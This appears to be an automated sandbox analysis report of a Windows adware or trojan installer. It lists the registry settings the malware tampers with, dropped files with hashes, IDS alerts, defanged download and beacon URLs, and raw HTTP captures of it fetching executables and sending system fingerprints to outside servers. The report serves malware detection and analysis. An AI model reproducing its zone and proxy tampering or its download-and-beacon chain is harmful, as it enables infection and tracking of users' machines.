[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKCR\telexes.compiles]
"(Default)" = "Inst Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\amisetup7604__99999_il2.exe"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisetup7604__99999_il2\DEBUG]
"Trace Level" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

[HKCR\telexes.compiles.1]
"(Default)" = "Inst Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following registry key(s):

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisetup7604__99999_il2\DEBUG]
"Trace Level"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
"AutoConfigURL"

[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\LocalServer32]
"ServerExecutable"

The process rundll32.exe:1608 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5C C3 DC 4C 77 F6 82 71 E0 B9 1E 22 B4 58 77 BB"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{0DE18ECC-A0CB-45DD-A02C-692114FF4B9B}]
"DisplayName" = "hohosearch - Uninstall"
"UninstallString" = "rundll32.exe %Program Files%\Atidogrudck\atdagent.dll,u /k={0DE18ECC-A0CB-45DD-A02C-692114FF4B9B}"

The process tmnqck.exe:2024 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\tmnqck\DEBUG]
"Trace Level"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"ProxyServer"

The process chcUpdateTsk.html5:1240 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "47 06 A8 5A 99 11 B7 29 09 8C 10 84 FA 67 08 4D"

Dropped PE files

MD5	File path
b80fc4706b18a05446598a2dce6c57a9	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\1.tmp.exe
84b3683a4ecca8a183ea5e8219934a05	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\amisetup7548__10235_il2.exe
84b3683a4ecca8a183ea5e8219934a05	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\amisetup7604__99999_il2.exe
9baa6c3392dc9c0ad1733882a3faf2ba	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\awh6.tmp
1fa9fe66c4c62c9fbb152972e8662e20	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\prepreinstaller_win.exe
54359f8ab1edeba9bf9f1f54346ec7d8	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\tmnqck.exe
1fa9fe66c4c62c9fbb152972e8662e20	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4N740QDH\prepreinstaller_win[1].exe
b80fc4706b18a05446598a2dce6c57a9	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\YB33U3FA\Bundle[1].exe
53107ede3553b72f6eda0778e5fc4319	c:\Program Files\Atidogrudck\atdagent.dll
5477005b383d549d0cf4d8fc761a27c0	c:\Program Files\Chocosyledusy\chcUpdateSrv.html5
1dce88ae76d5372a1e0da7a42aaff80e	c:\Program Files\Chocosyledusy\chcUpdateTsk.html5
4eb83fc544baae895b2f0bf2730e13d5	c:\Program Files\Coabuied\DeElevator.dll
629b6671ced1f1992d0f331b0dc97862	c:\Program Files\Coabuied\ckehack.html5
fdf352824c5caf92cc16abd2c2d84145	c:\Program Files\Coabuied\matile.dll
564799253de378dd915f98c4c16e8055	c:\Program Files\Coabuied\wihoy.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	392593	392704	4.42083	c54970e43ae7fb6d349b77b46bf40c0e
.rdata	397312	288548	288768	2.55493	db03ac8b0697ccb16a7696afcf5a8b9f
.data	688128	16388	7168	2.73465	7e82085e8f6d98eebe8373d48637ed99
.rsrc	708608	448	512	3.51688	d54acb5766f1897023ceb9a53d618b13
.reloc	712704	29172	29184	3.74339	eba389e2322dcf3c752080980a0fc413

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/index.php
hxxp://dyno3mlj15jgv.cloudfront.net/V38/amipb.js
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/namen.php
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/tdownload1.php
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/finalize.php
hxxp://d3tufnia3qwp0y.cloudfront.net/main/tmnqck.exe	54.192.98.62
hxxp://cds.j6b5e5z4.hwcdn.net/nop.exe	205.185.216.10
hxxp://d2jeaw7c5nmwo6.cloudfront.net/upt8hksa?uid=ADCA2197E17DE989DA91F56322BE0AB0&update0=version,201607181114&update1=sys,Microsoft.Windows.XP&update4=ref,amz&update5=mode,&update6=sys0,Microsoft&update7=sys1,Windows&update8=sys2,XP&update9=sys3,&update10=sys4,	54.192.98.18
hxxp://d2jeaw7c5nmwo6.cloudfront.net/gkozn0k4?uid=ADCA2197E17DE989DA91F56322BE0AB0&update0=version,201607181114&update1=sys,Microsoft.Windows.XP&update4=ref,amz&update5=mode,&update6=sys0,Microsoft&update7=sys1,Windows&update8=sys2,XP&update9=sys3,&update10=sys4,	54.192.98.18
hxxp://d2jeaw7c5nmwo6.cloudfront.net/te610ket?uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&update0=version,201607181114&update1=sys,Microsoft.Windows.XP&update4=ref,amz&update5=mode,&update6=sys0,Microsoft&update7=sys1,Windows&update8=sys2,XP&update9=sys3,&update10=sys4,	54.192.98.18
hxxp://d2jeaw7c5nmwo6.cloudfront.net/upt8hksa?uid=ADCA2197E17DE989DA91F56322BE0AB0&a=visit.dl.winmain.prestart4.54359f8ab1edeba9bf9f1f54346ec7d8.0	54.192.98.18
hxxp://d2jeaw7c5nmwo6.cloudfront.net/xl8bs23q?uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&update0=version,201607181114&update1=sys,Microsoft.Windows.XP&update4=ref,amz&update5=mode,&update6=sys0,Microsoft&update7=sys1,Windows&update8=sys2,XP&update9=sys3,&update10=sys4,	54.192.98.18
hxxp://d2jeaw7c5nmwo6.cloudfront.net/te610ket?uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&a=visit.dl.winmain.prestart4.54359f8ab1edeba9bf9f1f54346ec7d8.0	54.192.98.18
hxxp://d2jeaw7c5nmwo6.cloudfront.net/upt8hksa?uid=ADCA2197E17DE989DA91F56322BE0AB0&a=visit.dl.winmain.start.100	54.192.98.18
hxxp://d2jeaw7c5nmwo6.cloudfront.net/te610ket?uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&a=visit.dl.winmain.start.100	54.192.98.18
hxxp://d3dzwo5vzf4g44.cloudfront.net/i2/84	54.192.98.247
hxxp://d2umj5io7dy7ns.cloudfront.net/r6/84_5187e131bbe97c8dcab0db3e43d5a54b/1.n.txt	54.192.98.172
hxxp://d3dzwo5vzf4g44.cloudfront.net/s2/1468885288/84	54.192.98.247
hxxp://d2jeaw7c5nmwo6.cloudfront.net/gkozn0k4?uid=ADCA2197E17DE989DA91F56322BE0AB0&update0=searchurl,hohosearch	54.192.98.18
hxxp://d2jeaw7c5nmwo6.cloudfront.net/upt8hksa?uid=ADCA2197E17DE989DA91F56322BE0AB0&update0=searchurl,hohosearch	54.192.98.18
hxxp://www.continuumdownload.com/index.php	54.225.238.18
hxxp://www.continuumdownload.com/namen.php	54.225.238.18
hxxp://cdn1.downloadaxel.com/V38/amipb.js	54.192.98.230
hxxp://www.continuumdownload.com/finalize.php	54.225.238.18
hxxp://www.downloadaxel.com/tdownload1.php	54.225.137.51

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET MALWARE SoundCloud Downloader Install Beacon
ET POLICY Executable served from Amazon S3
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected

Traffic

POST /index.php HTTP/1.1

Accept: */*

Accept-Language: en-us

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.continuumdownload.com

Content-Length: 590

Connection: Keep-Alive

Cache-Control: no-cache

Net1.1=&Net2=3.5.21022.08&Net4=4.0.30319&OSversion=NT5.1SP3&Slv=&Sysid=B3920CF566AB717F84CE9CE32F62B904&Sysid1=B3920CF566AB717F84CE9CE32F62B904&X64=N&admin=Y&browser=IEXPLORE.EXE&cavp=&chver=&ci=10235&cmdl=amisetup7548__10235_il2.exe /s  /ver 1.1.2.41  /t /i NationZoom /u http://VVV.continuumdownload.com/index.php /ci 10235&dprod=19C2FB3DEC385401F6FCF22178334A&exe=amisetup7548__10235_il2&ffver=&i=NationZoom&lang_DfltUser=0409&mac=AA==&machg=NzVlZDk1NjctYWE1OC00YzhlLWE4ZWEtM2NhZDdjNDdhYjAzAA==&name=WFAzAA==&netfs=3&s=Y&tmode=1&ts=1468885270&ver=1.1.2.41
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8

Date: Mon, 18 Jul 2016 23:41:09 GMT

Server: Apache/2.2.15 (Red Hat)

X-Powered-By: PHP/5.3.3

transfer-encoding: chunked

Connection: keep-alive
4d9....<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//E
N">.<html>.    <head>.        <meta http-equiv="cont
ent-type" content="text/html; charset=UTF-8" /> .        <title&
gt;nop</title>...<script type="text/javascript">...  var g
_notCompatibleWithUpdaterComps = ['LootFindKP'];...  var g_postponedCo
mps = ['updater', 'Paltalk', 'SHAREit', 'JinshanDuba',  'UCwebAccelera
tor', 'UltimateSecurityPackage' ,  'TotalSecurity', 'TotalSecurityIN',
 'TotalSecurityRU'];...</script> .        <base href="hXXp://
VVV.continuumdownload.com:80/index.php" />.        <script type=
"text/javascript" src="hXXp://cdn1.downloadaxel.com/V38/amipb.js">&
lt;/script>.        <script type="text/javascript">.var g_r__
capp="nop";..            var g_amiobj = '', g_ami, g_updb = false, g_c
lose = '0', g_additional_offer_list = '0';.            var g_finish_in
stall_button = '0';.            var g_popup_install_all = '0';.       
     var g_eula = '';.            var g_post1 = '_hdn=1&_ver=1.1.2.41&
_p=1&_s=0&_cc=UA&_cid=10235&_psb=0&_cnt=da721c907b6c24eb05606fcf5cf1c4
85&_instid=l2&_brw=ie&_fc=1289&_appname=&_appimageurl=&_netfs=-31&_ver
t=3';.            var g_icon = '';.            var g_comps = [], g_pag
es = [], c, g_curPage = -1;.            var g_cid = '1..288c..0235';. 
           var g_tid = '';.            var g_cc = 'UA';.            va
r g_lang = 'en';.            var g_ip = '194.242.96.226';.            
var g_browser = 'ie';.            var g_cnt = '43db927915f3640d106<<< skipped >>>

GET /V38/amipb.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.continuumdownload.com/index.php

Accept-Language: en-us

Accept-Encoding: gzip, deflate

If-Modified-Since: Thu, 30 Jun 2016 11:47:44 GMT

If-None-Match: "ecff2ed06ac9c71e23853f0e7bd249e0"

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cdn1.downloadaxel.com

Connection: Keep-Alive


HTTP/1.1 304 Not Modified

Connection: keep-alive

Date: Mon, 18 Jul 2016 23:41:22 GMT

ETag: "ecff2ed06ac9c71e23853f0e7bd249e0"

x-amz-storage-class: REDUCED_REDUNDANCY

Server: AmazonS3

Age: 42468

X-Cache: Hit from cloudfront

Via: 1.1 795b65ff0c55e70d8791f9def508f3a8.cloudfront.net (CloudFront)

X-Amz-Cf-Id: A0D4LEmVV3R2Ua2mdWdAyDd-FBpcXHgmojtyoLpVBmhhdQcFiUcIbg==

HTTP/1.1 304 Not Modified..Connection: keep-alive..Date: Mon, 18 Jul 2
016 23:41:22 GMT..ETag: "ecff2ed06ac9c71e23853f0e7bd249e0"..x-amz-stor
age-class: REDUCED_REDUNDANCY..Server: AmazonS3..Age: 42468..X-Cache: 
Hit from cloudfront..Via: 1.1 795b65ff0c55e70d8791f9def508f3a8.cloudfr
ont.net (CloudFront)..X-Amz-Cf-Id: A0D4LEmVV3R2Ua2mdWdAyDd-FBpcXHgmojt
yoLpVBmhhdQcFiUcIbg==..

GET /r6/84_5187e131bbe97c8dcab0db3e43d5a54b/1.n.txt HTTP/1.1

Accept: */*

Connection: Keep-Alive

Cache-Control: no-cache

Host: d2umj5io7dy7ns.cloudfront.net


HTTP/1.1 200 OK

Content-Type: application/octet-stream

Content-Length: 1520528

Connection: keep-alive

Date: Mon, 18 Jul 2016 11:10:38 GMT

Last-Modified: Mon, 18 Jul 2016 11:05:01 GMT

ETag: "f5b50d11ed03664f4ce0d53699b7dcd0"

x-amz-storage-class: REDUCED_REDUNDANCY

x-amz-meta-content-md5: f5b50d11ed03664f4ce0d53699b7dcd0

Accept-Ranges: bytes

Server: AmazonS3

Age: 45052

X-Cache: Hit from cloudfront

Via: 1.1 ff7053cb54d39315806cac9d50632264.cloudfront.net (CloudFront)

X-Amz-Cf-Id: jOvT85j2LEEZkhz9gucvQ8_dtBPKNtTyY9EAk3cCKH6EznpcJAEayg==
.....W69..M....v._9s.`..|.O....2.. a#v.......7...cU0h. ....K..y......s
.[...|18..!)q..i..l.Q..s..... .....;...Fh~...#.%.f......b{.......Q..x.
...,.....9.\x~...n....Qo..9f.....N......(.}....z.`.#?5...il..Y..=.n..&
lt;...!..~..y...O.U.\T.T..C....................p........(za.:N}{...4%B
je..W%....k.M.Q...b.2F....`.sM.Ftq..z.z...DS.?...$...X2.e.F..bh...../.
..dd_Z.3'qL.......... .yX....`_a....Z..h#Aj...gtWo...i...x\..Z..J:oo}P
..4 .Qu..-....b$..R..C..].Q...e0.......Mz...n.!3..-J0...$.-ao......4$.
.......t=...U.`.....<".G...,...'E6yl..N/..P...=.PZ.. .*[email protected]........
m?..O.9...%.).........].R...K.VI.Y...R......].:."&.9H...h.O.....v..f/.
.I....nn...1...v.]C;3...Hg............}Y.?7....6.......2f..r.<.#r..
...{.......5N...\.......f..xP......A....2...@.$.t...:......b/.$....p.r
.;.k....B..2...&.dE,..,Rb.<~....<..B*.&(.~..k....{Ao.&=..'.wcx.\
.0>...o=..?.. 3(......O...b.M.2..2EH......p..&,.iBCv..t#...6....(.'
,.....t.{..."..l...xu..f..&r7.G.0P.jmjj.q..e>x...QdU....V_..IdN.9..
.le..H.$..W..TKI_.c.....Se.D.....&..B...Nkq..bQ..Xp9.e..E..@..F..5....
.P........E...K8o.|...9.6...K.#....1.....[...j.r...%..5*....&.B...M.k(
.#S...".{.\5P........{A.(2E.`1|.d.~..f.. .[...(..uL.<o`.m0_=R5.5..K
..Pm..`.............*\?..H......r.AQ'{R3..........FS#J.Ha"..t#?}V:!..]
.\F/.y.....qac.b"#...i..#.x*......0PT.n........o`......n~.2;Z.....G.36
..~%......2i..d..O.]I.w..G....(&=.. $.A...)pW.....V.]...'f. .P$..5..ha
|v.....9:[email protected]...&..IO....H.ezn....d.. .....d.Y... ..........d....s
l\....0=.Ld..UV.[)....Z....^..L'1..T$E........ ....(....y.....S.~G<<< skipped >>>

POST /i2/84 HTTP/1.1

Accept: */*

Content-Type: application/x-www-form-urlencoded

Host: d3dzwo5vzf4g44.cloudfront.net

Content-Length: 153

Cache-Control: no-cache

data=bWFjdj01LjEmcHRpZD1hbXomdWlkPVZNd2FyZVhWaXJ0dWFsWElERVhIYXJkWERyaXZlXzAwMDAwMDAwMDAwMDAwMDAwMDAxJnNtZDU9NTQzNTlmOGFiMWVkZWJhOWJmOWYxZjU0MzQ2ZWM3ZDg=
HTTP/1.1 302 Moved Temporarily

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

Server: nginx/1.8.0

Date: Mon, 18 Jul 2016 23:41:29 GMT

X-Powered-By: PHP/5.5.30

ut: 1468885289

Location: hXXp://d2umj5io7dy7ns.cloudfront.net/r6/84_5187e131bbe97c8dcab0db3e43d5a54b/1.n.txt

X-Cache: Miss from cloudfront

Via: 1.1 6296292885688507e00160ec3af83700.cloudfront.net (CloudFront)

X-Amz-Cf-Id: FtMgeqK5wsDvVP8ntH79sjf5n1pvdKyArI307k00iiZJLJ_x9QB7SA==

0..HTTP/1.1 302 Moved Temporarily..Content-Type: text/html..Transfer-E
ncoding: chunked..Connection: keep-alive..Server: nginx/1.8.0..Date: M
on, 18 Jul 2016 23:41:29 GMT..X-Powered-By: PHP/5.5.30..ut: 1468885289
..Location: hXXp://d2umj5io7dy7ns.cloudfront.net/r6/84_5187e131bbe97c8
dcab0db3e43d5a54b/1.n.txt..X-Cache: Miss from cloudfront..Via: 1.1 629
6292885688507e00160ec3af83700.cloudfront.net (CloudFront)..X-Amz-Cf-Id
: FtMgeqK5wsDvVP8ntH79sjf5n1pvdKyArI307k00iiZJLJ_x9QB7SA==..0..
....

POST /s2/1468885288/84 HTTP/1.1

Accept: */*

Content-Type: application/x-www-form-urlencoded

Host: d3dzwo5vzf4g44.cloudfront.net

Content-Length: 92

Cache-Control: no-cache

uid=ADCA2197E17DE989DA91F56322BE0AB0&uide=VMwareXVirtualXIDEXHardXDrive_00000000000000000001
HTTP/1.1 200 OK

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

Server: nginx/1.8.0

Date: Mon, 18 Jul 2016 23:41:37 GMT

X-Powered-By: PHP/5.5.30

X-Cache: Miss from cloudfront

Via: 1.1 6296292885688507e00160ec3af83700.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 0c67l8DetnobZftW6Dy_ntjN7xDBjODKLWWG6mYqfiqeYa5uL9Wlqg==

0..HTTP/1.1 200 OK..Content-Type: text/html..Transfer-Encoding: chunke
d..Connection: keep-alive..Server: nginx/1.8.0..Date: Mon, 18 Jul 2016
 23:41:37 GMT..X-Powered-By: PHP/5.5.30..X-Cache: Miss from cloudfront
..Via: 1.1 6296292885688507e00160ec3af83700.cloudfront.net (CloudFront
)..X-Amz-Cf-Id: 0c67l8DetnobZftW6Dy_ntjN7xDBjODKLWWG6mYqfiqeYa5uL9Wlqg
==..0..

GET /nop.exe HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cds.j6b5e5z4.hwcdn.net

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Mon, 18 Jul 2016 23:41:23 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1450621105"

Cache-Control: max-age=30752

Content-Length: 37172

Content-Type: application/octet-stream

X-HW: 1468885283.dop010.fr7.t,1468885283.cds057.fr7.c

Last-Modified: Sun, 20 Dec 2015 14:18:25 GMT

Content-Disposition: attachment; filename="nop.exe"
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..i
u..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L...d.
.K.................d..........^5............@.........................
......................................................................
......................................................................
.............................text....c.......d.................. ..`.r
data...............h..............@[email protected]...........|..........
[email protected]....... ...........................rsrc.................
..............@..@....................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected][email protected]...\.@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
[email protected]...`[email protected]
....E..9}[email protected].}[email protected]..
[email protected][email protected] [email protected].@._^3.
[.....L$....C...Si.....VW.T.....tO.q.3.;5..C.sB..i......D.......t.G...
..t...O..t .....u...3....3...F.....;5..C.r._^[...U..QQ.U.SV..i....<<< skipped >>>

POST /i2/84 HTTP/1.1

Accept: */*

Content-Type: application/x-www-form-urlencoded

Host: d3dzwo5vzf4g44.cloudfront.net

Content-Length: 153

Cache-Control: no-cache

data=bWFjdj01LjEmcHRpZD1hbXomdWlkPVZNd2FyZVhWaXJ0dWFsWElERVhIYXJkWERyaXZlXzAwMDAwMDAwMDAwMDAwMDAwMDAxJnNtZDU9NTQzNTlmOGFiMWVkZWJhOWJmOWYxZjU0MzQ2ZWM3ZDg=
HTTP/1.1 302 Moved Temporarily

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

Server: nginx/1.8.0

Date: Mon, 18 Jul 2016 23:41:28 GMT

X-Powered-By: PHP/5.5.30

ut: 1468885288

Location: hXXp://d2umj5io7dy7ns.cloudfront.net/r6/84_5187e131bbe97c8dcab0db3e43d5a54b/1.n.txt

X-Cache: Miss from cloudfront

Via: 1.1 3fe626ff9b8e73cd85a4a1e019abf439.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 9FfP_j22JGVzR-jF_czRlzRi8YG47xMoLPcCAPhgdxbosinj-Q01rg==

0..HTTP/1.1 302 Moved Temporarily..Content-Type: text/html..Transfer-E
ncoding: chunked..Connection: keep-alive..Server: nginx/1.8.0..Date: M
on, 18 Jul 2016 23:41:28 GMT..X-Powered-By: PHP/5.5.30..ut: 1468885288
..Location: hXXp://d2umj5io7dy7ns.cloudfront.net/r6/84_5187e131bbe97c8
dcab0db3e43d5a54b/1.n.txt..X-Cache: Miss from cloudfront..Via: 1.1 3fe
626ff9b8e73cd85a4a1e019abf439.cloudfront.net (CloudFront)..X-Amz-Cf-Id
: 9FfP_j22JGVzR-jF_czRlzRi8YG47xMoLPcCAPhgdxbosinj-Q01rg==..0..

GET /te610ket?uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&update0=version,201607181114&update1=sys,Microsoft.Windows.XP&update4=ref,amz&update5=mode,&update6=sys0,Microsoft&update7=sys1,Windows&update8=sys2,XP&update9=sys3,&update10=sys4, HTTP/1.1

Host: d2jeaw7c5nmwo6.cloudfront.net


HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Server: nginx/1.8.0

Date: Mon, 18 Jul 2016 23:41:27 GMT

X-Cache: Miss from cloudfront

Via: 1.1 954e53c2911d47d729ae27754b6408a8.cloudfront.net (CloudFront)

X-Amz-Cf-Id: eYPZAmHB4KUxXfv3ak-IIFv1XlKzLDJtq4k88gBhqrqVqNveMAJ0-w==
....


GET /xl8bs23q?uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&update0=version,201607181114&update1=sys,Microsoft.Windows.XP&update4=ref,amz&update5=mode,&update6=sys0,Microsoft&update7=sys1,Windows&update8=sys2,XP&update9=sys3,&update10=sys4, HTTP/1.1

Host: d2jeaw7c5nmwo6.cloudfront.net


HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Server: nginx/1.8.0

Date: Mon, 18 Jul 2016 23:41:27 GMT

X-Cache: Miss from cloudfront

Via: 1.1 954e53c2911d47d729ae27754b6408a8.cloudfront.net (CloudFront)

X-Amz-Cf-Id: TWBFtaJOhMHAzII90MPVcXTQkkVu3N81nMN3_RE_Kw944-ikKgzn3w==

....

GET /upt8hksa?uid=ADCA2197E17DE989DA91F56322BE0AB0&a=visit.dl.winmain.start.100 HTTP/1.1

Host: d2jeaw7c5nmwo6.cloudfront.net


HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Server: nginx/1.8.0

Date: Mon, 18 Jul 2016 23:41:27 GMT

X-Cache: Miss from cloudfront

Via: 1.1 954e53c2911d47d729ae27754b6408a8.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 6uzf9wBjIvF-tU7OpDqcYpIb8h4ZPMpxP0AddFqaVji94qw8NiY4iA==

HTTP/1.1 200 OK..Content-Length: 0..Connection: keep-alive..Server: ng
inx/1.8.0..Date: Mon, 18 Jul 2016 23:41:27 GMT..X-Cache: Miss from clo
udfront..Via: 1.1 954e53c2911d47d729ae27754b6408a8.cloudfront.net (Clo
udFront)..X-Amz-Cf-Id: 6uzf9wBjIvF-tU7OpDqcYpIb8h4ZPMpxP0AddFqaVji94qw
8NiY4iA==......

GET /gkozn0k4?uid=ADCA2197E17DE989DA91F56322BE0AB0&update0=searchurl,hohosearch HTTP/1.1

Host: d2jeaw7c5nmwo6.cloudfront.net


HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Server: n

POST /namen.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: VVV.continuumdownload.com

Content-Length: 62

Connection: Keep-Alive

campid=99999&i=NationZoom&prefix=amisetup7604&version=1.1.2.41
HTTP/1.1 200 OK

Content-Type: text/plain; charset=UTF-8

Date: Mon, 18 Jul 2016 23:41:16 GMT

Server: Apache/2.2.15 (Red Hat)

X-Powered-By: PHP/5.3.3

Content-Length: 177

Connection: keep-alive
[Data]..exe=amisetup7604.exe..url=hXXp://VVV.downloadaxel.com/tdownloa
d1.php..params=version=1.1.2.41&s1=40892244b230be839cbf3368d291c6a3b5e
fe967&t1=1468885456&campid=99999&z2=0HTTP/1.1 200 OK..Content-Type: te
xt/plain; charset=UTF-8..Date: Mon, 18 Jul 2016 23:41:16 GMT..Server: 
Apache/2.2.15 (Red Hat)..X-Powered-By: PHP/5.3.3..Content-Length: 177.
.Connection: keep-alive..[Data]..exe=amisetup7604.exe..url=hXXp://VVV.
downloadaxel.com/tdownload1.php..params=version=1.1.2.41&s1=40892244b2
30be839cbf3368d291c6a3b5efe967&t1=1468885456&campid=99999&z2=0..

POST /tdownload1.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: VVV.downloadaxel.com

Content-Length: 112

Connection: Keep-Alive

version=1.1.2.41&s1=40892244b230be839cbf3368d291c6a3b5efe967&t1=1468885456&campid=99999&z2=0&prefix=amisetup7604
HTTP/1.1 200 OK

Access-Control-Allow-Origin: *

Access-Control-Expose-Headers: X-Target-FN

Content-Disposition: attachment; filename="amisetup7604__99999_il2.exe"

Content-Type: application/x-msdownload

Date: Mon, 18 Jul 2016 23:41:16 GMT

Server: Apache/2.2.15 (Red Hat)

X-Powered-By: PHP/5.3.3

X-Target-FN: amisetup7604__99999_il2.exe

Content-Length: 812256

Connection: keep-alive
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........B...#j..#j.
.#j.6....#j.Y....#j.Y....#j.Y...)#j..U...#j..[...#j..[...#j..#k..#j...
...#j......#j......#j..#...#j......#j.Rich.#j.................PE..L...
qa.W.................L..........`u.......`....@.......................
................@.....................................(....@..`.......
[email protected]...@............`
...............................text...&K.......L.................. ..`
.rdata..7....`.......P..............@[email protected].......$............
[email protected]...`....@......................@[email protected][email protected]..
[email protected]..................................................
......................................................................
......................................................................
......................................................................
............................................RQ.I\.....................
..................@....."B............................U...E.].........
VW..W..j.V..e.......>_^.........U...U..M.......1..3......]......U..
.E....E..A..A.......]........U..V..W.N...t..}........._..^]....F...t.P
